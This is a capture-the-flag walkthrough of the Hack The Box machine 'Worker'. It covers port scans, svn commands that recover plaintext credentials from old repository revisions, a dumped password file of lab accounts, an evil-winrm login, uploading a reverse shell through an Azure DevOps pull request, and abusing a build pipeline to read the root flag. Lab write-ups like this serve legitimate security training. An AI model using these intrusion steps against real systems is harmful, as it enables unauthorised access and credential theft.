Worker - [HTB]
Table of Contents
Worker is a medium level Windows machine where the attacker first will have to face something similar to git in order to find a new domain, a user and a password. Then, using Azure devops will have to upload a reverse shell with the purpose of finding another user name and password getting the user flag with evil-Winrm. Finally, once again, using Azure devops the attacker will have to configure a pipeline, so at building time Azure will print the root flag.
As always start scanning all opened ports with nmap.
kali@kali:$ sudo nmap -sS -p- -T5 --open -n -oN AllPorts.txt 10.10.10.203 [sudo] password for kali: Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-05 17:07 EST Nmap scan report for 10.10.10.203 Host is up (0.043s latency). Not shown: 65532 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 80/tcp open http 3690/tcp open svn 5985/tcp open wsman
Then, I continue with a deeper scan obtaining a bit of information about each service.
kali@kali:$ sudo nmap -sC -sV -p80,3690,5985 -n -oN PortsInDepth.txt 10.10.10.203 Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-05 17:14 EST Nmap scan report for 10.10.10.203 Host is up (0.044s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 3690/tcp open svnserve Subversion 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds
In port 80 there is a Windows Server web page with just and image (Using gobuster didn't provide much information).
In the port 3690 there is a service named subversion (a software versioning and revision control system distributed as open source under the Apache License (Is like a GitHub Repository)), where we can retrieve a lot of information using subversion-cli tool and its specials syntax.
Let's First gathere some information like the repository like its author, the number of changes, its root repository ...
kali@kali:$ svn info svn://worker.htb Path: . URL: svn://worker.htb Relative URL: ^/ Repository Root: svn://worker.htb Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1 Revision: 5 Node Kind: directory Last Changed Author: nathen Last Changed Rev: 5 Last Changed Date: 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020)
Secondly, which files are stored in the repository.
kali@kali:$ svn list svn://worker.htb dimension.worker.htb/ moved.txt
We can download them with the following commands.
kali@kali:$ svn export svn://worker.htb/moved.txt kali@kali:$ svn export svn://worker.htb/dimension.worker.htb/
movedt.txt file there is a new domain, where we can dig deeper in order to find more information.
kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/Worker$ cat moved.txt This repository has been migrated and will no longer be maintaned here. You can find the latest version at: http://devops.worker.htb The Worker team :)
However, in order to get access we need to provide some credentials, but we don't have any.
Inside the "dimension.worker.htb/index.html" we can find several domains. However, adding theme to the "/etc/hosts" file doesn't doesn't seem to be useful for now.
Looking into the different "revisions" there is a PowerShell file named "deploy.ps1", where we can find a user name and a password.
kali@kali:$ svn checkout -r 2 svn://worker.htb kali@kali:$ svn list -r 2 svn://worker.htb deploy.ps1 dimension.worker.htb/ kali@kali:$ cat deploy.ps1 $user = "nathen" $plain = "wendel98" $pwd = ($plain | ConvertTo-SecureString) $Credential = New-Object System.Management.Automation.PSCredential $user, $pwd $args = "Copy-Site.ps1" Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
This credential is being used to access to the devops domain, where there is an Azure DevOps page (Azure DevOps is a Microsoft product that provides version control of files like Git). Inside the web page, we can see a repository about a "Smart hotel".
The files inside the repository are the same as the ones that we can find for the web http://spectral.worker.htb/.
So, we could upload a web reverse shell for windows server so we can get access to the server internals. However, we can not upload a shell directly to the repository, we need to do a pull request.
Furthermore, we can not create a branch followed by a pull request because the request will never be completed because we don't have any work items linked.
Finally, in order to upload a reverse shell we need to go to the "Boards" section clicking in one of the Work items.
Then, we need to click on the 3 dots, clicking on new branch.
The appearing pop up should looks like this (Obviously, without the word exploit :V ).
Once, our shell has been uploaded to the repository, we can create a pull request.
Click on "Create" and finally on "Complete" and our shell will be uploaded.
Now, we can create a listening port and when we access to http://spectral.worker.htb/rshell.aspx, we retrieve our reverse shell. However, you won't find anything useful on the
C: drive, that is because this machine is composed with another hard drive.
c:\inetpub\wwwroot>fsutil fsinfo drives Drives: C:\ W:\ c:\inetpub\wwwroot>cd /D W:\
W:\ there is a file named
passwd with a lot of users and passwords.
W:\svnrepos\www\conf>cat passwd cat passwd ### This file is an example password file for svnserve. ### Its format is similar to that of svnserve.conf. As shown in the ### example below it contains one section labelled [users]. ### The name and password for each user follow, one account per line. [users] nathen = wendel98 nichin = fqerfqerf nichin = asifhiefh noahip = player nuahip = wkjdnw oakhol = bxwdjhcue owehol = supersecret paihol = painfulcode parhol = gitcommit pathop = iliketomoveit pauhor = nowayjose payhos = icanjive perhou = elvisisalive peyhou = ineedvacation phihou = pokemon quehub = pickme quihud = kindasecure rachul = guesswho raehun = idontknow ramhun = thisis ranhut = getting rebhyd = rediculous reeinc = iagree reeing = tosomepoint reiing = isthisenough renipr = dummy rhiire = users riairv = canyou ricisa = seewhich robish = onesare robisl = wolves11 robive = andwhich ronkay = onesare rubkei = the rupkel = sheeps ryakel = imtired sabken = drjones samken = aqua sapket = hamburger sarkil = friday
Between all of them, the one below works for accessing to the system using the winrm service (5985)
For that we can use evil-winrm as you can see with the following command.
kali@kali:~/Downloads/evil-winrm-2.3$ evil-winrm -i worker.htb -u robisl -p wolves11 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\robisl\Documents> cat ..\Desktop\user.txt
Furthermore, this credential can be used to get access to the Azure DevOps web page. Finding a new repository.
Because we have access to the repository, we can use the Azure Pipelines to execute code on the windows machine that will be executed once our pull request has been accepted. So in order to get our root flag, we need to access to the repository, press "Pipelines" and then "New pipeline".
After that, click on "Azure Repos Git" as our platform for the repository.
Select the repository "PartsUnlimited".
Click on "ASP.NET Core" for building and testing ASP.NET Core projects.
Modify the "azyre-pipelines.yml" file so during building time will be executed.
Note: Don't forget to remove the line
Then, click in the "Save and run" button and wait to pipeline to finish.
Finally, click on "dotnet build release" so you will see the root flag.